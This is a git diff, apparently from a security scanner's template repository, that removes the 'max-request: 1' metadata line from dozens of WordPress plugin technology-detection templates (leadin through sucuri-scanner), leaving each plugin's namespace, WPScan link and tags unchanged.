diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml
index 1c16a72d76..6f06b49011 100644
--- a/http/technologies/wordpress/plugins/loginpress.yaml
+++ b/http/technologies/wordpress/plugins/loginpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginpress/
   metadata:
-    max-request: 1
     plugin_namespace: loginpress
     wpscan: https://wpscan.com/plugin/loginpress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
